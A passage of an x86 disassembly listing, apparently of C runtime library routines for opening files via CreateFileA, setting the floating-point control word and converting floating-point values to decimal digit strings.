call sub_426528
mov dword ptr [eax], 9
or eax, 0FFFFFFFFh
loc_42BF96: ; CODE XREF: sub_42BF07+7F�j
pop edi
pop esi
pop ebx
retn
sub_42BF07 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42BF9A proc near ; CODE XREF: sub_426DD4+13F�p
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_1 = byte ptr -1
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 1Ch
mov ecx, [ebp+arg_4]
push ebx
xor ebx, ebx
push esi
test cl, 80h
push edi
mov [ebp+var_1C], 0Ch
mov [ebp+var_18], ebx
jz short loc_42BFC0
mov [ebp+var_14], ebx
mov [ebp+var_1], 10h
jmp short loc_42BFCB
; ---------------------------------------------------------------------------
loc_42BFC0: ; CODE XREF: sub_42BF9A+1B�j
and [ebp+var_1], 0
mov [ebp+var_14], 1
loc_42BFCB: ; CODE XREF: sub_42BF9A+24�j
mov eax, 8000h
test ecx, eax
jnz short loc_42BFE5
test ch, 40h
jnz short loc_42BFE1
cmp dword_631730, eax
jz short loc_42BFE5
loc_42BFE1: ; CODE XREF: sub_42BF9A+3D�j
or [ebp+var_1], 80h
loc_42BFE5: ; CODE XREF: sub_42BF9A+38�j
; sub_42BF9A+45�j
push 3
mov eax, ecx
pop esi
and eax, esi
sub eax, ebx
jz short loc_42C00C
dec eax
jz short loc_42C003
dec eax
jnz loc_42C09E
mov [ebp+var_C], 0C0000000h
jmp short loc_42C013
; ---------------------------------------------------------------------------
loc_42C003: ; CODE XREF: sub_42BF9A+57�j
mov [ebp+var_C], 40000000h
jmp short loc_42C013
; ---------------------------------------------------------------------------
loc_42C00C: ; CODE XREF: sub_42BF9A+54�j
mov [ebp+var_C], 80000000h
loc_42C013: ; CODE XREF: sub_42BF9A+67�j
; sub_42BF9A+70�j
mov eax, [ebp+arg_8]
cmp eax, 10h
jz short loc_42C041
cmp eax, 20h
jz short loc_42C038
cmp eax, 30h
jz short loc_42C02F
cmp eax, 40h
jnz short loc_42C09E
mov [ebp+var_10], esi
jmp short loc_42C044
; ---------------------------------------------------------------------------
loc_42C02F: ; CODE XREF: sub_42BF9A+89�j
mov [ebp+var_10], 2
jmp short loc_42C044
; ---------------------------------------------------------------------------
loc_42C038: ; CODE XREF: sub_42BF9A+84�j
mov [ebp+var_10], 1
jmp short loc_42C044
; ---------------------------------------------------------------------------
loc_42C041: ; CODE XREF: sub_42BF9A+7F�j
mov [ebp+var_10], ebx
loc_42C044: ; CODE XREF: sub_42BF9A+93�j
; sub_42BF9A+9C�j ...
mov edx, 700h
mov eax, 400h
and ecx, edx
mov edi, 100h
cmp ecx, eax
jg short loc_42C08A
jz short loc_42C085
cmp ecx, ebx
jz short loc_42C085
cmp ecx, edi
jz short loc_42C07C
cmp ecx, 200h
jz short loc_42C0B8
cmp ecx, 300h
jnz short loc_42C09E
mov [ebp+var_8], 2
jmp short loc_42C0C8
; ---------------------------------------------------------------------------
loc_42C07C: ; CODE XREF: sub_42BF9A+C7�j
mov [ebp+var_8], 4
jmp short loc_42C0C8
; ---------------------------------------------------------------------------
loc_42C085: ; CODE XREF: sub_42BF9A+BF�j
; sub_42BF9A+C3�j
mov [ebp+var_8], esi
jmp short loc_42C0C8
; ---------------------------------------------------------------------------
loc_42C08A: ; CODE XREF: sub_42BF9A+BD�j
cmp ecx, 500h
jz short loc_42C0C1
cmp ecx, 600h
jz short loc_42C0B8
cmp ecx, edx
jz short loc_42C0C1
loc_42C09E: ; CODE XREF: sub_42BF9A+5A�j
; sub_42BF9A+8E�j ...
call sub_426528
mov dword ptr [eax], 16h
call sub_426531
mov [eax], ebx
or eax, 0FFFFFFFFh
jmp loc_42C264
; ---------------------------------------------------------------------------
loc_42C0B8: ; CODE XREF: sub_42BF9A+CF�j
; sub_42BF9A+FE�j
mov [ebp+var_8], 5
jmp short loc_42C0C8
; ---------------------------------------------------------------------------
loc_42C0C1: ; CODE XREF: sub_42BF9A+F6�j
; sub_42BF9A+102�j
mov [ebp+var_8], 1
loc_42C0C8: ; CODE XREF: sub_42BF9A+E0�j
; sub_42BF9A+E9�j ...
mov eax, [ebp+arg_4]
mov esi, 80h
test eax, edi
jz short loc_42C0E7
mov ecx, dword_631468
not ecx
and ecx, [ebp+arg_C]
test cl, 80h
jnz short loc_42C0E7
push 1
pop esi
loc_42C0E7: ; CODE XREF: sub_42BF9A+138�j
; sub_42BF9A+148�j
test al, 40h
jz short loc_42C0F5
or esi, 4000000h
or byte ptr [ebp+var_C+2], 1
loc_42C0F5: ; CODE XREF: sub_42BF9A+14F�j
test ah, 10h
jz short loc_42C0FC
or esi, edi
loc_42C0FC: ; CODE XREF: sub_42BF9A+15E�j
test al, 20h
jz short loc_42C108
or esi, 8000000h
jmp short loc_42C112
; ---------------------------------------------------------------------------
loc_42C108: ; CODE XREF: sub_42BF9A+164�j
test al, 10h
jz short loc_42C112
or esi, 10000000h
loc_42C112: ; CODE XREF: sub_42BF9A+16C�j
; sub_42BF9A+170�j
call sub_42BC26
mov ebx, eax
or edi, 0FFFFFFFFh
cmp ebx, edi
jnz short loc_42C13A
call sub_426528
mov dword ptr [eax], 18h
call sub_426531
and dword ptr [eax], 0
mov eax, edi
jmp loc_42C264
; ---------------------------------------------------------------------------
loc_42C13A: ; CODE XREF: sub_42BF9A+184�j
push 0
push esi
push [ebp+var_8]
lea eax, [ebp+var_1C]
push eax
push [ebp+var_10]
push [ebp+var_C]
push [ebp+arg_0]
call dword_42F060 ; CreateFileA
mov esi, eax
cmp esi, edi
jnz short loc_42C16D
loc_42C159: ; CODE XREF: sub_42BF9A+1E5�j
call dword_42F068 ; RtlGetLastWin32Error
push eax
call sub_4264B5
pop ecx
mov esi, edi
jmp loc_42C25B
; ---------------------------------------------------------------------------
loc_42C16D: ; CODE XREF: sub_42BF9A+1BD�j
push esi
call dword_42F1D0 ; GetFileType
test eax, eax
jnz short loc_42C181
push esi
call dword_42F038 ; CloseHandle
jmp short loc_42C159
; ---------------------------------------------------------------------------
loc_42C181: ; CODE XREF: sub_42BF9A+1DC�j
cmp eax, 2
jnz short loc_42C18C
or [ebp+var_1], 40h
jmp short loc_42C195
; ---------------------------------------------------------------------------
loc_42C18C: ; CODE XREF: sub_42BF9A+1EA�j
cmp eax, 3
jnz short loc_42C195
or [ebp+var_1], 8
loc_42C195: ; CODE XREF: sub_42BF9A+1F0�j
; sub_42BF9A+1F5�j
push esi
push ebx
call sub_42BD49
mov eax, ebx
pop ecx
sar eax, 5
pop ecx
mov cl, [ebp+var_1]
lea edi, ds:6319E0h[eax*4]
mov eax, ebx
or cl, 1
and eax, 1Fh
mov byte ptr [ebp+arg_0+3], cl
lea esi, [eax+eax*8]
mov eax, [edi]
shl esi, 2
and byte ptr [ebp+arg_0+3], 48h
mov [eax+esi+4], cl
jnz short loc_42C242
test cl, 80h
jz short loc_42C242
test byte ptr [ebp+arg_4], 2
jz short loc_42C242
push 2
push 0FFFFFFFFh
push ebx
call sub_426D61
add esp, 0Ch
cmp eax, 0FFFFFFFFh
mov [ebp+var_10], eax
jnz short loc_42C203
call sub_426531
cmp dword ptr [eax], 83h
jz short loc_42C242
loc_42C1F7: ; CODE XREF: sub_42BF9A+294�j
; sub_42BF9A+2A6�j
push ebx
call sub_4265E4
pop ecx
or esi, 0FFFFFFFFh
jmp short loc_42C25B
; ---------------------------------------------------------------------------
loc_42C203: ; CODE XREF: sub_42BF9A+24E�j
and byte ptr [ebp+arg_8+3], 0
lea eax, [ebp+arg_8+3]
push 1
push eax
push ebx
call sub_426967
add esp, 0Ch
test eax, eax
jnz short loc_42C230
cmp byte ptr [ebp+arg_8+3], 1Ah
jnz short loc_42C230
push [ebp+var_10]
push ebx
call sub_42D6D7
pop ecx
cmp eax, 0FFFFFFFFh
pop ecx
jz short loc_42C1F7
loc_42C230: ; CODE XREF: sub_42BF9A+27E�j
; sub_42BF9A+284�j
push 0
push 0
push ebx
call sub_426D61
add esp, 0Ch
cmp eax, 0FFFFFFFFh
jz short loc_42C1F7
loc_42C242: ; CODE XREF: sub_42BF9A+22E�j
; sub_42BF9A+233�j ...
cmp byte ptr [ebp+arg_0+3], 0
jnz short loc_42C259
test byte ptr [ebp+arg_4], 8
jz short loc_42C259
mov eax, [edi]
or byte ptr [eax+esi+4], 20h
lea eax, [eax+esi+4]
loc_42C259: ; CODE XREF: sub_42BF9A+2AC�j
; sub_42BF9A+2B2�j
mov esi, ebx
loc_42C25B: ; CODE XREF: sub_42BF9A+1CE�j
; sub_42BF9A+267�j
push ebx
call sub_42BEE5
pop ecx
mov eax, esi
loc_42C264: ; CODE XREF: sub_42BF9A+119�j
; sub_42BF9A+19B�j
pop edi
pop esi
pop ebx
leave
retn
sub_42BF9A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42C269 proc near ; CODE XREF: sub_42C29E+E�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push esi
fstcw word ptr [ebp+var_4]
push [ebp+var_4]
call sub_42C2B4
mov esi, eax
mov eax, [ebp+arg_4]
not eax
and esi, eax
mov eax, [ebp+arg_0]
and eax, [ebp+arg_4]
or esi, eax
push esi
call sub_42C346
pop ecx
mov [ebp+arg_4], eax
pop ecx
fldcw word ptr [ebp+arg_4]
mov eax, esi
pop esi
leave
retn
sub_42C269 endp
; =============== S U B R O U T I N E =======================================
sub_42C29E proc near ; CODE XREF: sub_4289E9+A�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, [esp+arg_4]
and eax, 0FFF7FFFFh
push eax
push [esp+4+arg_0]
call sub_42C269
pop ecx
pop ecx
retn
sub_42C29E endp
; =============== S U B R O U T I N E =======================================
sub_42C2B4 proc near ; CODE XREF: sub_42C269+C�p
arg_0 = dword ptr 4
push ebx
mov ebx, [esp+4+arg_0]
xor eax, eax
push ebp
test bl, 1
push edi
jz short loc_42C2C5
push 10h
pop eax
loc_42C2C5: ; CODE XREF: sub_42C2B4+C�j
test bl, 4
jz short loc_42C2CC
or al, 8
loc_42C2CC: ; CODE XREF: sub_42C2B4+14�j
test bl, 8
jz short loc_42C2D3
or al, 4
loc_42C2D3: ; CODE XREF: sub_42C2B4+1B�j
test bl, 10h
jz short loc_42C2DA
or al, 2
loc_42C2DA: ; CODE XREF: sub_42C2B4+22�j
test bl, 20h
jz short loc_42C2E1
or al, 1
loc_42C2E1: ; CODE XREF: sub_42C2B4+29�j
test bl, 2
jz short loc_42C2EB
or eax, 80000h
loc_42C2EB: ; CODE XREF: sub_42C2B4+30�j
movzx ecx, bx
push esi
mov edx, ecx
mov esi, 0C00h
mov edi, 300h
and edx, esi
mov ebp, 200h
jz short loc_42C323
cmp edx, 400h
jz short loc_42C320
cmp edx, 800h
jz short loc_42C31C
cmp edx, esi
jnz short loc_42C323
or eax, edi
jmp short loc_42C323
; ---------------------------------------------------------------------------
loc_42C31C: ; CODE XREF: sub_42C2B4+5E�j
or eax, ebp
jmp short loc_42C323
; ---------------------------------------------------------------------------
loc_42C320: ; CODE XREF: sub_42C2B4+56�j
or ah, 1
loc_42C323: ; CODE XREF: sub_42C2B4+4E�j
; sub_42C2B4+62�j ...
and ecx, edi
pop esi
jz short loc_42C333
cmp ecx, ebp
jnz short loc_42C338
or eax, 10000h
jmp short loc_42C338
; ---------------------------------------------------------------------------
loc_42C333: ; CODE XREF: sub_42C2B4+72�j
or eax, 20000h
loc_42C338: ; CODE XREF: sub_42C2B4+76�j
; sub_42C2B4+7D�j
pop edi
pop ebp
test bh, 10h
pop ebx
jz short locret_42C345
or eax, 40000h
locret_42C345: ; CODE XREF: sub_42C2B4+8A�j
retn
sub_42C2B4 endp
; =============== S U B R O U T I N E =======================================
sub_42C346 proc near ; CODE XREF: sub_42C269+23�p
arg_0 = dword ptr 4
push ebx
mov ebx, [esp+4+arg_0]
xor eax, eax
push esi
test bl, 10h
jz short loc_42C356
push 1
pop eax
loc_42C356: ; CODE XREF: sub_42C346+B�j
test bl, 8
jz short loc_42C35D
or al, 4
loc_42C35D: ; CODE XREF: sub_42C346+13�j
test bl, 4
jz short loc_42C364
or al, 8
loc_42C364: ; CODE XREF: sub_42C346+1A�j
test bl, 2
jz short loc_42C36B
or al, 10h
loc_42C36B: ; CODE XREF: sub_42C346+21�j
test bl, 1
jz short loc_42C372
or al, 20h
loc_42C372: ; CODE XREF: sub_42C346+28�j
test ebx, 80000h
jz short loc_42C37C
or al, 2
loc_42C37C: ; CODE XREF: sub_42C346+32�j
mov ecx, ebx
mov edx, 300h
and ecx, edx
mov esi, 200h
jz short loc_42C3A9
cmp ecx, 100h
jz short loc_42C3A6
cmp ecx, esi
jz short loc_42C3A1
cmp ecx, edx
jnz short loc_42C3A9
or ah, 0Ch
jmp short loc_42C3A9
; ---------------------------------------------------------------------------
loc_42C3A1: ; CODE XREF: sub_42C346+50�j
or ah, 8
jmp short loc_42C3A9
; ---------------------------------------------------------------------------
loc_42C3A6: ; CODE XREF: sub_42C346+4C�j
or ah, 4
loc_42C3A9: ; CODE XREF: sub_42C346+44�j
; sub_42C346+54�j ...
mov ecx, ebx
and ecx, 30000h
jz short loc_42C3BF
cmp ecx, 10000h
jnz short loc_42C3C1
or eax, esi
jmp short loc_42C3C1
; ---------------------------------------------------------------------------
loc_42C3BF: ; CODE XREF: sub_42C346+6B�j
or eax, edx
loc_42C3C1: ; CODE XREF: sub_42C346+73�j
; sub_42C346+77�j
pop esi
test ebx, 40000h
pop ebx
jz short locret_42C3CE
or ah, 10h
locret_42C3CE: ; CODE XREF: sub_42C346+83�j
retn
sub_42C346 endp
; =============== S U B R O U T I N E =======================================
sub_42C3CF proc near ; CODE XREF: sub_42C46E+48�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, [esp+arg_4]
push esi
push 20h
cdq
pop ecx
idiv ecx
push 1Fh
mov esi, eax
mov eax, [esp+8+arg_4]
cdq
idiv ecx
pop ecx
mov eax, [esp+4+arg_0]
sub ecx, edx
or edx, 0FFFFFFFFh
shl edx, cl
not edx
test [eax+esi*4], edx
jnz short loc_42C414
inc esi
cmp esi, 3
jge short loc_42C40F
lea eax, [eax+esi*4]
loc_42C401: ; CODE XREF: sub_42C3CF+3E�j
cmp dword ptr [eax], 0
jnz short loc_42C414
inc esi
add eax, 4
cmp esi, 3
jl short loc_42C401
loc_42C40F: ; CODE XREF: sub_42C3CF+2D�j
push 1
pop eax
pop esi
retn
; ---------------------------------------------------------------------------
loc_42C414: ; CODE XREF: sub_42C3CF+27�j
; sub_42C3CF+35�j
xor eax, eax
pop esi
retn
sub_42C3CF endp
; =============== S U B R O U T I N E =======================================
sub_42C418 proc near ; CODE XREF: sub_42C46E+57�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, [esp+arg_4]
push ebx
push esi
push edi
push 20h
mov ebx, [esp+10h+arg_0]
cdq
pop ecx
idiv ecx
mov esi, eax
mov eax, [esp+0Ch+arg_4]
cdq
idiv ecx
lea edi, [ebx+esi*4]
push edi
push 1Fh
pop ecx
push 1
pop eax
sub ecx, edx
shl eax, cl
push eax
push dword ptr [edi]
call sub_42D9BB
add esp, 0Ch
dec esi
js short loc_42C46A
lea edi, [ebx+esi*4]
loc_42C451: ; CODE XREF: sub_42C418+50�j
test eax, eax
jz short loc_42C46A
push edi
push 1
push dword ptr [edi]
call sub_42D9BB
add esp, 0Ch
dec esi
sub edi, 4
test esi, esi
jge short loc_42C451
loc_42C46A: ; CODE XREF: sub_42C418+34�j
; sub_42C418+3B�j
pop edi
pop esi
pop ebx
retn
sub_42C418 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42C46E proc near ; CODE XREF: sub_42C5C9+81�p
; sub_42C5C9+CC�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ecx
mov eax, [ebp+arg_4]
push ebx
push esi
push edi
lea edi, [eax-1]
push 20h
pop ecx
and [ebp+var_4], 0
lea ebx, [edi+1]
push 20h
mov eax, ebx
pop esi
cdq
idiv ecx
push 1Fh
mov ecx, eax
mov eax, ebx
cdq
idiv esi
mov eax, [ebp+arg_0]
pop esi
push 1
mov [ebp+var_8], ecx
lea eax, [eax+ecx*4]
mov [ebp+arg_4], eax
sub esi, edx
pop edx
mov ecx, esi
shl edx, cl
test [eax], edx
jz short loc_42C4D2
inc ebx
push ebx
push [ebp+arg_0]
call sub_42C3CF
pop ecx
test eax, eax
pop ecx
jnz short loc_42C4CF
push edi
push [ebp+arg_0]
call sub_42C418
pop ecx
mov [ebp+var_4], eax
pop ecx
loc_42C4CF: ; CODE XREF: sub_42C46E+51�j
mov eax, [ebp+arg_4]
loc_42C4D2: ; CODE XREF: sub_42C46E+41�j
or edx, 0FFFFFFFFh
mov ecx, esi
shl edx, cl
push 3
pop ecx
and [eax], edx
mov eax, [ebp+var_8]
inc eax
cmp eax, ecx
jge short loc_42C4F2
mov edx, [ebp+arg_0]
sub ecx, eax
lea edi, [edx+eax*4]
xor eax, eax
rep stosd
loc_42C4F2: ; CODE XREF: sub_42C46E+76�j
mov eax, [ebp+var_4]
pop edi
pop esi
pop ebx
leave
retn
sub_42C46E endp
; =============== S U B R O U T I N E =======================================
sub_42C4FA proc near ; CODE XREF: sub_42C5C9+75�p
; sub_42C5C9+B6�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, [esp+arg_4]
mov ecx, [esp+arg_0]
push esi
push 3
sub ecx, eax
pop edx
loc_42C508: ; CODE XREF: sub_42C4FA+17�j
mov esi, [eax]
mov [ecx+eax], esi
add eax, 4
dec edx
jnz short loc_42C508
pop esi
retn
sub_42C4FA endp
; =============== S U B R O U T I N E =======================================
sub_42C515 proc near ; CODE XREF: sub_42C5C9+5F�p
; sub_42C5C9+9E�p ...
arg_0 = dword ptr 4
push edi
mov edi, [esp+4+arg_0]
xor eax, eax
stosd
stosd
stosd
pop edi
retn
sub_42C515 endp
; =============== S U B R O U T I N E =======================================
sub_42C521 proc near ; CODE XREF: sub_42C5C9+4D�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
xor ecx, ecx
loc_42C527: ; CODE XREF: sub_42C521+12�j
cmp dword ptr [eax], 0
jnz short loc_42C539
inc ecx
add eax, 4
cmp ecx, 3
jl short loc_42C527
push 1
pop eax
retn
; ---------------------------------------------------------------------------
loc_42C539: ; CODE XREF: sub_42C521+9�j
xor eax, eax
retn
sub_42C521 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42C53C proc near ; CODE XREF: sub_42C5C9+C0�p
; sub_42C5C9+DA�p ...
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 0Ch
mov eax, [ebp+arg_4]
push ebx
push esi
push edi
push 20h
mov edi, [ebp+arg_0]
pop ebx
or esi, 0FFFFFFFFh
cdq
mov ecx, ebx
mov [ebp+var_4], 3
idiv ecx
mov [ebp+var_C], eax
mov eax, [ebp+arg_4]
cdq
idiv ecx
and [ebp+arg_4], 0
mov ecx, edx
shl esi, cl
sub ebx, edx
not esi
loc_42C572: ; CODE XREF: sub_42C53C+58�j
mov eax, [edi]
mov ecx, eax
and ecx, esi
mov [ebp+var_8], ecx
mov ecx, edx
shr eax, cl
or eax, [ebp+arg_4]
mov [edi], eax
mov eax, [ebp+var_8]
mov ecx, ebx
add edi, 4
shl eax, cl
dec [ebp+var_4]
mov [ebp+arg_4], eax
jnz short loc_42C572
mov edi, [ebp+var_C]
push 2
pop ebx
mov esi, edi
push 8
pop ecx
shl esi, 2
loc_42C5A4: ; CODE XREF: sub_42C53C+86�j
cmp ebx, edi
jl short loc_42C5B7
mov edx, [ebp+arg_0]
mov eax, ecx
sub eax, esi
mov eax, [eax+edx]
mov [ecx+edx], eax
jmp short loc_42C5BE
; ---------------------------------------------------------------------------
loc_42C5B7: ; CODE XREF: sub_42C53C+6A�j
mov eax, [ebp+arg_0]
and dword ptr [ecx+eax], 0
loc_42C5BE: ; CODE XREF: sub_42C53C+79�j
dec ebx
sub ecx, 4
jns short loc_42C5A4
pop edi
pop esi
pop ebx
leave
retn
sub_42C53C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42C5C9 proc near ; CODE XREF: sub_42C735+D�p
; sub_42C74B+D�p
var_18 = byte ptr -18h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 18h
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
movzx ecx, word ptr [eax+0Ah]
mov ebx, ecx
and ecx, 8000h
mov [ebp+arg_0], ecx
mov ecx, [eax+6]
mov [ebp+var_C], ecx
mov ecx, [eax+2]
movzx eax, word ptr [eax]
mov edi, [ebp+arg_8]
and ebx, 7FFFh
sub ebx, 3FFFh
mov [ebp+var_8], ecx
shl eax, 10h
cmp ebx, 0FFFFC001h
mov [ebp+var_4], eax
jnz short loc_42C636
lea eax, [ebp+var_C]
xor esi, esi
push eax
call sub_42C521
test eax, eax
pop ecx
jnz loc_42C6F5
lea eax, [ebp+var_C]
push eax
call sub_42C515
pop ecx
loc_42C62E: ; CODE XREF: sub_42C5C9+E4�j
push 2
loc_42C630: ; CODE XREF: sub_42C5C9+110�j
pop eax
jmp loc_42C6F7
; ---------------------------------------------------------------------------
loc_42C636: ; CODE XREF: sub_42C5C9+45�j
lea eax, [ebp+var_C]
push eax
lea eax, [ebp+var_18]
push eax
call sub_42C4FA
push dword ptr [edi+8]
lea eax, [ebp+var_C]
push eax
call sub_42C46E
add esp, 10h
test eax, eax
jz short loc_42C657
inc ebx
loc_42C657: ; CODE XREF: sub_42C5C9+8B�j
mov eax, [edi+4]
mov ecx, eax
sub ecx, [edi+8]
cmp ebx, ecx
jge short loc_42C66F
lea eax, [ebp+var_C]
push eax
call sub_42C515
pop ecx
jmp short loc_42C6AB
; ---------------------------------------------------------------------------
loc_42C66F: ; CODE XREF: sub_42C5C9+98�j
cmp ebx, eax
jg short loc_42C6B2
sub eax, ebx
mov esi, eax
lea eax, [ebp+var_18]
push eax
lea eax, [ebp+var_C]
push eax
call sub_42C4FA
lea eax, [ebp+var_C]
push esi
push eax
call sub_42C53C
push dword ptr [edi+8]
lea eax, [ebp+var_C]
push eax
call sub_42C46E
mov eax, [edi+0Ch]
inc eax
push eax
lea eax, [ebp+var_C]
push eax
call sub_42C53C
add esp, 20h
loc_42C6AB: ; CODE XREF: sub_42C5C9+A4�j
xor esi, esi
jmp loc_42C62E
; ---------------------------------------------------------------------------
loc_42C6B2: ; CODE XREF: sub_42C5C9+A8�j
cmp ebx, [edi]
jl short loc_42C6DE
lea eax, [ebp+var_C]
push eax
call sub_42C515
push dword ptr [edi+0Ch]
or byte ptr [ebp+var_C+3], 80h
lea eax, [ebp+var_C]
push eax
call sub_42C53C
mov esi, [edi+14h]
add esp, 0Ch
add esi, [edi]
push 1
jmp loc_42C630
; ---------------------------------------------------------------------------
loc_42C6DE: ; CODE XREF: sub_42C5C9+EB�j
push dword ptr [edi+0Ch]
mov esi, [edi+14h]
and byte ptr [ebp+var_C+3], 7Fh
lea eax, [ebp+var_C]
push eax
add esi, ebx
call sub_42C53C
pop ecx
pop ecx
loc_42C6F5: ; CODE XREF: sub_42C5C9+55�j
xor eax, eax
loc_42C6F7: ; CODE XREF: sub_42C5C9+68�j
push 1Fh
pop ecx
sub ecx, [edi+0Ch]
mov edi, [edi+10h]
shl esi, cl
mov ecx, [ebp+arg_0]
neg ecx
sbb ecx, ecx
and ecx, 80000000h
or esi, ecx
or esi, [ebp+var_C]
cmp edi, 40h
jnz short loc_42C726
mov ecx, [ebp+arg_4]
mov edx, [ebp+var_8]
mov [ecx+4], esi
mov [ecx], edx
jmp short loc_42C730
; ---------------------------------------------------------------------------
loc_42C726: ; CODE XREF: sub_42C5C9+14E�j
cmp edi, 20h
jnz short loc_42C730
mov ecx, [ebp+arg_4]
mov [ecx], esi
loc_42C730: ; CODE XREF: sub_42C5C9+15B�j
; sub_42C5C9+160�j
pop edi
pop esi
pop ebx
leave
retn
sub_42C5C9 endp
; =============== S U B R O U T I N E =======================================
sub_42C735 proc near ; CODE XREF: sub_42C761+23�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push offset dword_44BFD0
push [esp+4+arg_4]
push [esp+8+arg_0]
call sub_42C5C9
add esp, 0Ch
retn
sub_42C735 endp
; =============== S U B R O U T I N E =======================================
sub_42C74B proc near ; CODE XREF: sub_42C78E+23�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push offset dword_44BFE8
push [esp+4+arg_4]
push [esp+8+arg_0]
call sub_42C5C9
add esp, 0Ch
retn
sub_42C74B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42C761 proc near ; CODE XREF: sub_428B22+12�p
var_C = byte ptr -0Ch
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 0Ch
xor eax, eax
push eax
push eax
push eax
push eax
push [ebp+arg_4]
lea eax, [ebp+arg_4]
push eax
lea eax, [ebp+var_C]
push eax
call sub_42DB5C
push [ebp+arg_0]
lea eax, [ebp+var_C]
push eax
call sub_42C735
add esp, 24h
leave
retn
sub_42C761 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42C78E proc near ; CODE XREF: sub_428B22+2D�p
var_C = byte ptr -0Ch
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 0Ch
xor eax, eax
push eax
push eax
push eax
push eax
push [ebp+arg_4]
lea eax, [ebp+arg_4]
push eax
lea eax, [ebp+var_C]
push eax
call sub_42DB5C
push [ebp+arg_0]
lea eax, [ebp+var_C]
push eax
call sub_42C74B
add esp, 24h
leave
retn
sub_42C78E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42C7BB proc near ; CODE XREF: sub_428B60+41�p
; sub_428C83+38�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
mov edx, [ebp+arg_8]
push ebx
mov ebx, [ebp+arg_4]
push esi
mov esi, [ebp+arg_0]
mov ecx, [edx+0Ch]
push edi
lea edi, [esi+1]
mov byte ptr [esi], 30h
test ebx, ebx
mov eax, edi
jle short loc_42C7F8
mov [ebp+arg_0], ebx
xor ebx, ebx
loc_42C7DE: ; CODE XREF: sub_42C7BB+38�j
mov dl, [ecx]
test dl, dl
jz short loc_42C7EA
movsx edx, dl
inc ecx
jmp short loc_42C7ED
; ---------------------------------------------------------------------------
loc_42C7EA: ; CODE XREF: sub_42C7BB+27�j
push 30h
pop edx
loc_42C7ED: ; CODE XREF: sub_42C7BB+2D�j
mov [eax], dl
inc eax
dec [ebp+arg_0]
jnz short loc_42C7DE
mov edx, [ebp+arg_8]
loc_42C7F8: ; CODE XREF: sub_42C7BB+1C�j
and byte ptr [eax], 0
test ebx, ebx
jl short loc_42C811
cmp byte ptr [ecx], 35h
jl short loc_42C811
loc_42C804: ; CODE XREF: sub_42C7BB+52�j
dec eax
cmp byte ptr [eax], 39h
jnz short loc_42C80F
mov byte ptr [eax], 30h
jmp short loc_42C804
; ---------------------------------------------------------------------------
loc_42C80F: ; CODE XREF: sub_42C7BB+4D�j
inc byte ptr [eax]
loc_42C811: ; CODE XREF: sub_42C7BB+42�j
; sub_42C7BB+47�j
cmp byte ptr [esi], 31h
jnz short loc_42C81B
inc dword ptr [edx+4]
jmp short loc_42C82D
; ---------------------------------------------------------------------------
loc_42C81B: ; CODE XREF: sub_42C7BB+59�j
push edi
call sub_422120
inc eax
push eax
push edi
push esi
call sub_423C20
add esp, 10h
loc_42C82D: ; CODE XREF: sub_42C7BB+5E�j
pop edi
pop esi
pop ebx
pop ebp
retn
sub_42C7BB endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42C832 proc near ; CODE XREF: sub_428B60+19�p
; sub_428C83+19�p ...
var_28 = word ptr -28h
var_26 = byte ptr -26h
var_24 = byte ptr -24h
var_C = byte ptr -0Ch
arg_0 = byte ptr 8
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 28h
push esi
lea eax, [ebp+arg_0]
push edi
push eax
lea eax, [ebp+var_C]
push eax
call sub_42C88E
pop ecx
lea eax, [ebp+var_28]
pop ecx
lea esi, [ebp+var_C]
push eax
push 0
push 11h
sub esp, 0Ch
mov edi, esp
movsd
movsd
movsw
call sub_42E02D
mov esi, [ebp+arg_8]
mov edi, [ebp+arg_C]
mov [esi+8], eax
movsx eax, [ebp+var_26]
mov [esi], eax
movsx eax, [ebp+var_28]
mov [esi+4], eax
lea eax, [ebp+var_24]
push eax
push edi
call sub_423260
add esp, 20h
mov [esi+0Ch], edi
mov eax, esi
pop edi
pop esi
leave
retn
sub_42C832 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42C88E proc near ; CODE XREF: sub_42C832+10�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
mov edx, [ebp+arg_4]
push ebx
push esi
push edi
